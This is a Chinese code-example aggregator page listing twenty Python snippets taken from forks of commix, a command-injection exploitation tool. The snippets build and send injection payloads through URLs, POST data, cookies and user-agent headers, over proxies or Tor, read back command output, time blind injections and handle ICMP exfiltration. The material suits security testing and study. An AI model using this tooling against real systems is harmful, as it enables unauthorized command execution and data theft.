本文整理汇总了Python中src.core.requests.headers.do_check函数的典型用法代码示例。如果您正苦于以下问题:Python do_check函数的具体用法?Python do_check怎么用?Python do_check使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了do_check函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。
示例1: injection
def injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell):
if alter_shell:
# Classic decision payload (check if host is vulnerable).
payload = cb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
else:
# Classic decision payload (check if host is vulnerable).
payload = cb_payloads.cmd_execution(separator, TAG, cmd)
if separator == " ":
payload = re.sub(" ", "%20", payload)
else:
payload = re.sub(" ", whitespace, payload)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = "".join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
else:
开发者ID:MajorD4m4ge,项目名称:commix,代码行数:60,代码来源:cb_injector.py
示例2: warning_detection
def warning_detection(url, http_request_method):
try:
# Find the host part
url_part = url.split("=")[0]
request = urllib2.Request(url_part)
# Check if defined extra headers.
headers.do_check(request)
response = requests.get_request_response(request)
if response:
response = urllib2.urlopen(request)
html_data = response.read()
err_msg = ""
if "eval()'d code" in html_data:
err_msg = "'eval()'"
if "Cannot execute a blank command in" in html_data:
err_msg = "execution of a blank command,"
if "sh: command substitution:" in html_data:
err_msg = "command substitution"
if "Warning: usort()" in html_data:
err_msg = "'usort()'"
if re.findall(r"=/(.*)/&", url):
if "Warning: preg_replace():" in html_data:
err_msg = "'preg_replace()'"
url = url.replace("/&","/e&")
if "Warning: assert():" in html_data:
err_msg = "'assert()'"
if "Failure evaluating code:" in html_data:
err_msg = "code evaluation"
if err_msg != "":
warn_msg = "A failure message on " + err_msg + " was detected on page's response."
print settings.print_warning_msg(warn_msg)
return url
except urllib2.HTTPError, err_msg:
print settings.print_critical_msg(err_msg)
raise SystemExit()
开发者ID:Cyber-Forensic,项目名称:commix,代码行数:35,代码来源:eb_injector.py
示例3: injection_test
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding spaces.
payload = payload.replace(" ","%20")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
try:
# Get the response of the request
response = get_request_response(request)
except KeyboardInterrupt:
response = None
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
try:
# Get the response of the request
response = get_request_response(request)
except KeyboardInterrupt:
response = None
return response, vuln_parameter
开发者ID:jamesshew,项目名称:commix,代码行数:60,代码来源:fb_injector.py
示例4: authentication_process
def authentication_process():
auth_url = menu.options.auth_url
auth_data = menu.options.auth_data
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
request = opener.open(urllib2.Request(auth_url))
cookies = ""
for cookie in cj:
cookie_values = cookie.name + "=" + cookie.value + "; "
cookies += cookie_values
if len(cookies) != 0 :
menu.options.cookie = cookies.rstrip()
if settings.VERBOSITY_LEVEL >= 1:
success_msg = "The received cookie is "
success_msg += menu.options.cookie + Style.RESET_ALL + "."
print settings.print_success_msg(success_msg)
urllib2.install_opener(opener)
request = urllib2.Request(auth_url, auth_data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request.
response = requests.get_request_response(request)
return response
开发者ID:BMaChina,项目名称:commix,代码行数:27,代码来源:authentication.py
示例5: inject_cookie
def inject_cookie(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
if settings.TIME_RELATIVE_ATTACK :
payload = urllib.quote(payload)
# Check if defined POST data
if menu.options.data:
menu.options.data = settings.USER_DEFINED_POST_DATA
request = urllib2.Request(url, menu.options.data)
else:
url = parameters.get_url_part(url)
request = urllib2.Request(url)
#Check if defined extra headers.
headers.do_check(request)
payload = checks.newline_fixation(payload)
request.add_header('Cookie', menu.options.cookie.replace(settings.INJECT_TAG, payload))
try:
headers.check_http_traffic(request)
response = opener.open(request)
return response
except ValueError:
pass
开发者ID:security-geeks,项目名称:commix,代码行数:26,代码来源:requests.py
示例6: injection_test
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding spaces.
payload = payload.replace(" ","%20")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
except KeyboardInterrupt:
response = None
开发者ID:Mechkov,项目名称:commix,代码行数:29,代码来源:fb_injector.py
示例7: injection_results
def injection_results(url, OUTPUT_TEXTFILE, delay):
# Find the correct directory.
path = url
path_parts = path.split('/')
count = 0
for part in path_parts:
count = count + 1
count = count - 1
last_param = path_parts[count]
output = url.replace(last_param, OUTPUT_TEXTFILE)
time.sleep(delay)
# Check if defined extra headers.
request = urllib2.Request(output)
headers.do_check(request)
# Evaluate test results.
output = urllib2.urlopen(request)
html_data = output.read()
shell = re.findall(r"(.*)", html_data)
return shell
#eof
开发者ID:evilrovot,项目名称:commix,代码行数:25,代码来源:fb_injector.py
示例8: do_check
def do_check(url):
check_proxy = True
try:
if settings.VERBOSITY_LEVEL >= 1:
info_msg = "Setting the HTTP proxy for all HTTP requests... "
print settings.print_info_msg(info_msg)
# Check if defined POST data
if menu.options.data:
request = urllib2.Request(url, menu.options.data)
else:
request = urllib2.Request(url)
# Check if defined extra headers.
headers.do_check(request)
request.set_proxy(menu.options.proxy,settings.PROXY_SCHEME)
try:
check = urllib2.urlopen(request)
except urllib2.HTTPError, error:
check = error
except:
check_proxy = False
pass
if check_proxy == True:
pass
else:
err_msg = "Unable to connect to the target URL or proxy ("
err_msg += menu.options.proxy
err_msg += ")."
print settings.print_critical_msg(err_msg)
raise SystemExit()
开发者ID:security-geeks,项目名称:commix,代码行数:29,代码来源:proxy.py
示例9: icmp_exfiltration_handler
def icmp_exfiltration_handler(url, http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print "\n" + Back.RED + "(x) Error: You need to have root privileges to run this option." + Style.RESET_ALL
os._exit(0)
if http_request_method == "GET":
url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
os._exit(0)
开发者ID:R3NW4,项目名称:commix,代码行数:27,代码来源:icmp_exfiltration.py
示例10: injection_test
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
开发者ID:evilrovot,项目名称:commix,代码行数:35,代码来源:fb_injector.py
示例11: do_check
def do_check(url):
check_proxy = True
info_msg = "Testing proxy " + menu.options.proxy + "... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
try:
# Check if defined POST data
if menu.options.data:
request = urllib2.Request(url, menu.options.data)
else:
request = urllib2.Request(url)
# Check if defined extra headers.
headers.do_check(request)
request.set_proxy(menu.options.proxy,settings.PROXY_PROTOCOL)
try:
check = urllib2.urlopen(request)
except urllib2.HTTPError, error:
check = error
except:
check_proxy = False
pass
if check_proxy == True:
sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + " ]\n")
sys.stdout.flush()
# Check if defined "--force-ssl" option AND "--proxy" option.
# We then force the proxy to https
if menu.options.force_ssl and menu.options.proxy:
settings.PROXY_PROTOCOL = 'https'
else:
print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]"
err_msg = "Could not connect to proxy."
print settings.print_error_msg(err_msg)
sys.exit(0)
开发者ID:HugoDelval,项目名称:commix,代码行数:34,代码来源:proxy.py
示例12: icmp_exfiltration_handler
def icmp_exfiltration_handler(url, http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print "\n" + Back.RED + settings.ERROR_SIGN + "You need to have root privileges to run this option." + Style.RESET_ALL
os._exit(0)
if http_request_method == "GET":
#url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
开发者ID:hanshaze,项目名称:commix,代码行数:32,代码来源:icmp_exfiltration.py
示例13: warning_detection
def warning_detection(url, http_request_method):
try:
# Find the host part
url_part = url.split("=")[0]
request = urllib2.Request(url_part)
# Check if defined extra headers.
headers.do_check(request)
response = urllib2.urlopen(request)
html_data = response.read()
error_msg = ""
if "eval()'d code" in html_data:
error_msg = "'eval()'"
if "Cannot execute a blank command in" in html_data:
error_msg = "execution of a blank command,"
if "sh: command substitution:" in html_data:
error_msg = "command substitution"
if "Warning: usort()" in html_data:
error_msg = "'usort()'"
if re.findall(r"=/(.*)/&", url):
if "Warning: preg_replace():" in html_data:
error_msg = "'preg_replace()'"
url = url.replace("/&","/e&")
if "Warning: assert():" in html_data:
error_msg = "'assert()'"
if "Failure evaluating code:" in html_data:
error_msg = "code evaluation"
if error_msg != "":
print Fore.YELLOW + settings.WARNING_SIGN + "A failure message on " + error_msg + " was detected on page's response." + Style.RESET_ALL
return url
except urllib2.HTTPError, err:
print Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
raise SystemExit()
开发者ID:jbrahy,项目名称:commix,代码行数:32,代码来源:eb_injector.py
示例14: icmp_exfiltration_handler
def icmp_exfiltration_handler(url,http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print colors.BGRED + "\n(x) Error: You need to have root privileges to run this option.\n" + colors.RESET
sys.exit(0)
if http_request_method == "GET":
url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter,url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
开发者ID:moscaliucpaulandrei,项目名称:commix,代码行数:30,代码来源:ICMP_Exfiltration.py
示例15: injection_test
def injection_test(payload,http_request_method,url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
# Just to be sure
response.read()
开发者ID:MiauWuffMiau,项目名称:commix,代码行数:35,代码来源:fb_injector.py
示例16: do_check
def do_check(url):
check_proxy = True
sys.stdout.write(settings.INFO_SIGN + "Testing proxy " + menu.options.proxy + "... ")
sys.stdout.flush()
try:
# Check if defined POST data
if menu.options.data:
request = urllib2.Request(url, menu.options.data)
else:
request = urllib2.Request(url)
# Check if defined extra headers.
headers.do_check(request)
request.set_proxy(menu.options.proxy,settings.PROXY_PROTOCOL)
try:
check = urllib2.urlopen(request)
except urllib2.HTTPError, error:
check = error
except:
check_proxy = False
pass
if check_proxy == True:
sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + " ]\n")
sys.stdout.flush()
else:
print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]"
print Back.RED + settings.ERROR_SIGN + "Could not connect to proxy." + Style.RESET_ALL
sys.exit(0)
开发者ID:0day29,项目名称:commix,代码行数:27,代码来源:proxy.py
示例17: do_check
def do_check(url):
check_proxy = True
sys.stdout.write("(*) Testing proxy "+menu.options.proxy+" ... ")
sys.stdout.flush()
try:
request = urllib2.Request(url)
# Check if defined extra headers.
headers.do_check(request)
request.set_proxy(menu.options.proxy,"http")
try:
check = urllib2.urlopen(request)
except urllib2.HTTPError, error:
check = error
except:
check_proxy = False
pass
if check_proxy == True:
sys.stdout.write("["+colors.GREEN+" OK "+colors.RESET+"]\n")
sys.stdout.flush()
else:
print "[" + colors.BGRED+ " FAILED "+colors.RESET+"]\n"
sys.exit(1)
开发者ID:CodeGuardian,项目名称:commix,代码行数:27,代码来源:proxy.py
示例18: injection
def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):
if menu.options.file_write or menu.options.file_upload :
minlen = 0
else:
minlen = 1
print "\n(*) Retrieving the length of execution output..."
for j in range(int(minlen),int(maxlen)):
# Execute shell commands on vulnerable host.
if not alter_shell :
payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
else:
payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + colors.GREY + payload.replace("\n","\\n") + colors.RESET)
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
payload = urllib.quote(payload)
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
#print target
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
else:
try:
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
开发者ID:TheNameIsNigel,项目名称:commix,代码行数:58,代码来源:tfb_injector.py
示例19: injection
def injection(separator,TAG,cmd,prefix,suffix,whitespace,http_request_method,url,vuln_parameter):
# Execute shell commands on vulnerable host.
payload = cb_payloads.cmd_execution(separator,TAG,cmd)
if separator == " " :
payload = re.sub(" ", "%20", payload)
else:
payload = re.sub(" ", whitespace, payload)
# Check if defined "--prefix" option.
if menu.options.prefix:
prefix = menu.options.prefix
payload = prefix + payload
else:
payload = prefix + payload
# Check if defined "--suffix" option.
if menu.options.suffix:
suffix = menu.options.suffix
payload = payload + suffix
else:
payload = payload + suffix
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
else:
try:
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
开发者ID:LZ-SecurityTeam,项目名称:commix,代码行数:58,代码来源:cb_injector.py
示例20: injection_test
def injection_test(payload, http_request_method, url):
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = get_request_response(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
data = json.loads(data, strict = False)
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = get_request_response(request)
end = time.time()
how_long = int(end - start)
return how_long, vuln_parameter
开发者ID:jack51706,项目名称:commix,代码行数:57,代码来源:tfb_injector.py
注:本文中的src.core.requests.headers.do_check函数示例由纯净天空整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
请发表评论